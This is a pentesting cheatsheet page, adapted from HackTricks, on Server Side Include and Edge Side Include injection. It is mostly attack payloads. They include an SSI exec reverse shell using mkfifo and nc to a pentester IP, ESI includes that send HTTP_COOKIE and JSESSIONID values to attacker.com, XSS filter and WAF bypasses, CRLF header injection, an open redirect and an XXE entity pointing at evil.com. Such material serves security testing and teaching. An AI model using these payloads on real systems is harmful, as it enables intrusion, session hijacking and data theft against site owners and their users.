daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

server-side-inclusion-edge-side-inclusion-injection.md (10188B)


      1 ---
      2 title: "Server Side Inclusion/Edge Side Inclusion Injection"
      3 section: "Web Pentesting"
      4 sectionSlug: "pentesting-web"
      5 sourcePath: "src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Server Side Inclusion/Edge Side Inclusion Injection
     14 
     15 ## Server Side Inclusion Basic Information
     16 
     17 **(Introduction taken from** [**Apache docs**](https://httpd.apache.org/docs/current/howto/ssi.html)**)**<sup>[[1]](#references)</sup>
     18 
     19 SSI (Server Side Includes) are directives that are **placed in HTML pages, and evaluated on the server** while the pages are being served. They let you **add dynamically generated content** to an existing HTML page, without having to serve the entire page via a CGI program, or other dynamic technology.\
     20 For example, you might place a directive into an existing HTML page, such as:
     21 
     22 `<!--#echo var="DATE_LOCAL" -->`
     23 
     24 And, when the page is served, this fragment will be evaluated and replaced with its value:
     25 
     26 `Tuesday, 15-Jan-2013 19:28:54 EST`
     27 
     28 The decision of when to use SSI, and when to have your page entirely generated by some program, is usually a matter of how much of the page is static, and how much needs to be recalculated every time the page is served. SSI is a great way to add small pieces of information, such as the current time - shown above. But if a majority of your page is being generated at the time that it is served, you need to look for some other solution.
     29 
     30 You can infer the presence of SSI if the web application uses files with the extensions**`.shtml`, `.shtm` or `.stm`**, but it's not only the case.<sup>[[1]](#references)</sup>
     31 
     32 A typical SSI expression has the following format:
     33 
     34 ```text
     35 <!--#directive param="value" -->
     36 ```
     37 
     38 ### Check
     39 
     40 ```javascript
     41 // Document name
     42 <!--#echo var="DOCUMENT_NAME" -->
     43 // Date
     44 <!--#echo var="DATE_LOCAL" -->
     45 
     46 // File inclusion
     47 <!--#include virtual="/index.html" -->
     48 // Including files (same directory)
     49 <!--#include file="file_to_include.html" -->
     50 // CGI Program results
     51 <!--#include virtual="/cgi-bin/counter.pl" -->
     52 // Including virtual files (same directory)
     53 <!--#include virtual="file_to_include.html" -->
     54 // Modification date of a file
     55 <!--#flastmod file="index.html" -->
     56 
     57 // Command exec
     58 <!--#exec cmd="dir" -->
     59 // Command exec
     60 <!--#exec cmd="ls" -->
     61 // Reverse shell
     62 <!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->
     63 
     64 // Print all variables
     65 <!--#printenv -->
     66 // Setting variables
     67 <!--#set var="name" value="Rich" -->
     68 
     69 ```
     70 
     71 ## Edge Side Inclusion
     72 
     73 There is a problem **caching information or dynamic applications** as part of the content may have **varied** for the next time the content is retrieved. This is what **ESI** is used form, to indicate using ESI tags the **dynamic content that needs to be generated** before sending the cache version.\
     74 If an **attacker** is able to **inject an ESI tag** inside the cache content, then, he could be able to i**nject arbitrary content** on the document before it's sent to the users.
     75 
     76 ### ESI Detection
     77 
     78 The following **header** in a response from the server means that the server is using ESI:
     79 
     80 ```text
     81 Surrogate-Control: content="ESI/1.0"
     82 ```
     83 
     84 If you can't find this header, the server **might be using ESI anyways**.\
     85 A **blind exploitation approach can also be used** as a request should arrive to the attackers server:
     86 
     87 ```javascript
     88 // Basic detection
     89 hell<!--esi-->o
     90 // If previous is reflected as "hello", it's vulnerable
     91 
     92 // Blind detection
     93 <esi:include src=http://attacker.com>
     94 
     95 // XSS Exploitation Example
     96 <esi:include src=http://attacker.com/XSSPAYLOAD.html>
     97 
     98 // Cookie Stealer (bypass httpOnly flag)
     99 <esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>
    100 
    101 // Introduce private local files (Not LFI per se)
    102 <esi:include src="https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/supersecret.txt">
    103 
    104 // Valid for Akamai, sends debug information in the response
    105 <esi:debug/>
    106 ```
    107 
    108 ### ESI exploitation
    109 
    110 [GoSecure created](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/) a table to understand possible attacks that we can try against different ESI-capable software, depending on the functionality supported:<sup>[[2]](#references)</sup>
    111 
    112 - **Includes**: Supports the `<esi:includes>` directive
    113 - **Vars**: Supports the `<esi:vars>` directive. Useful for bypassing XSS Filters
    114 - **Cookie**: Document cookies are accessible to the ESI engine
    115 - **Upstream Headers Required**: Surrogate applications will not process ESI statements unless the upstream application provides the headers
    116 - **Host Allowlist**: In this case, ESI includes are only possible from allowed server hosts, making SSRF, for example, only possible against those hosts
    117 
    118 |         **Software**         | **Includes** | **Vars** | **Cookies** | **Upstream Headers Required** | **Host Whitelist** |
    119 | :--------------------------: | :----------: | :------: | :---------: | :---------------------------: | :----------------: |
    120 |            Squid3            |     Yes      |   Yes    |     Yes     |              Yes              |         No         |
    121 |        Varnish Cache         |     Yes      |    No    |     No      |              Yes              |        Yes         |
    122 |            Fastly            |     Yes      |    No    |     No      |              No               |        Yes         |
    123 | Akamai ESI Test Server (ETS) |     Yes      |   Yes    |     Yes     |              No               |         No         |
    124 |          NodeJS esi          |     Yes      |   Yes    |     Yes     |              No               |         No         |
    125 |        NodeJS nodesi         |     Yes      |    No    |     No      |              No               |      Optional      |
    126 
    127 #### XSS
    128 
    129 The following ESI directive will load an arbitrary file inside the response of the server
    130 
    131 ```xml
    132 <esi:include src=http://attacker.com/xss.html>
    133 ```
    134 
    135 #### Bypass client XSS protection
    136 
    137 ```xml
    138 x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
    139 
    140 Use <!--esi--> to bypass WAFs:
    141 <scr<!--esi-->ipt>aler<!--esi-->t(1)</sc<!--esi-->ript>
    142 <img+src=x+on<!--esi-->error=ale<!--esi-->rt(1)>
    143 ```
    144 
    145 #### Steal Cookie
    146 
    147 - Remote steal cookie
    148 
    149 ```xml
    150 <esi:include src=http://attacker.com/$(HTTP_COOKIE)>
    151 <esi:include src="http://attacker.com/?cookie=$(HTTP_COOKIE{'JSESSIONID'})" />
    152 ```
    153 
    154 - Steal cookie HTTP_ONLY with XSS by reflecting it in the response:<sup>[[4]](#references)</sup>
    155 
    156 ```bash
    157 # This will reflect the cookies in the response
    158 <!--esi $(HTTP_COOKIE) -->
    159 # Reflect XSS (you can put '"><svg/onload=prompt(1)>' URL encoded and the URL encode eveyrhitng to send it in the HTTP request)
    160 <!--esi/$url_decode('"><svg/onload=prompt(1)>')/-->
    161 
    162 # It's possible to put more complex JS code to steal cookies or perform actions
    163 ```
    164 
    165 #### Private Local File
    166 
    167 Do not confuse this with a "Local File Inclusion":
    168 
    169 ```html
    170 <esi:include src="https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/secret.txt">
    171 ```
    172 
    173 #### CRLF
    174 
    175 ```html
    176 <esi:include src="http://anything.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>
    177 ```
    178 
    179 #### Open Redirect
    180 
    181 The following will add a `Location` header to the response<sup>[[4]](#references)</sup>
    182 
    183 ```bash
    184 <!--esi $add_header('Location','http://attacker.com') -->
    185 ```
    186 
    187 #### Add Header
    188 
    189 - Add header in forced request<sup>[[3]](#references)</sup>
    190 
    191 ```xml
    192 <esi:include src="http://example.com/asdasd">
    193 <esi:request_header name="User-Agent" value="12345"/>
    194 </esi:include>
    195 ```
    196 
    197 - Add header in response (useful to bypass "Content-Type: text/json" in a response with XSS)<sup>[[4]](#references)</sup>
    198 
    199 ```bash
    200 <!--esi/$add_header('Content-Type','text/html')/-->
    201 
    202 <!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->
    203 
    204 # Check the number of url_decode to know how many times you can URL encode the value
    205 ```
    206 
    207 #### CRLF in Add header (**CVE-2019-2438)**
    208 
    209 ```xml
    210 <esi:include src="http://example.com/asdasd">
    211 <esi:request_header name="User-Agent" value="12345
    212 Host: anotherhost.com"/>
    213 </esi:include>
    214 ```
    215 
    216 #### Akamai debug
    217 
    218 This will send debug information included in the response:
    219 
    220 ```xml
    221 <esi:debug/>
    222 ```
    223 
    224 ### ESI + XSLT = XXE
    225 
    226 It's possible to use **`eXtensible Stylesheet Language Transformations (XSLT)`** syntax in ESI just by indicating the param **`dca`** value as **`xslt`**. Which might allow to abuse **XSLT** to create and abuse a XML External Entity vulnerability (XXE):<sup>[[3]](#references)</sup>
    227 
    228 ```xml
    229 <esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" />
    230 ```
    231 
    232 XSLT file:
    233 
    234 ```xml
    235 <?xml version="1.0" encoding="ISO-8859-1"?>
    236 <!DOCTYPE xxe [<!ENTITY xxe SYSTEM "http://evil.com/file" >]>
    237 <foo>&xxe;</foo>
    238 ```
    239 
    240 Check the XSLT page:
    241 
    242 
    243 [Xslt Server Side Injection Extensible Stylesheet Language Transformations](/hacktricks/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations)
    244 
    245 ## Brute-Force Detection List
    246 
    247 
    248 [Ssi Esi.Txt](https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/https%3A/github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt)
    249 
    250 ## References
    251 
    252 - [1] [Apache HTTP Server Tutorial: Server Side Includes](https://httpd.apache.org/docs/current/howto/ssi.html)
    253 - [2] [Beyond XSS: Edge Side Include Injection](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/)
    254 - [3] [ESI Injection Part 2: Abusing specific implementations](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/)
    255 - [4] [Exploring the World of ESI Injection](https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91)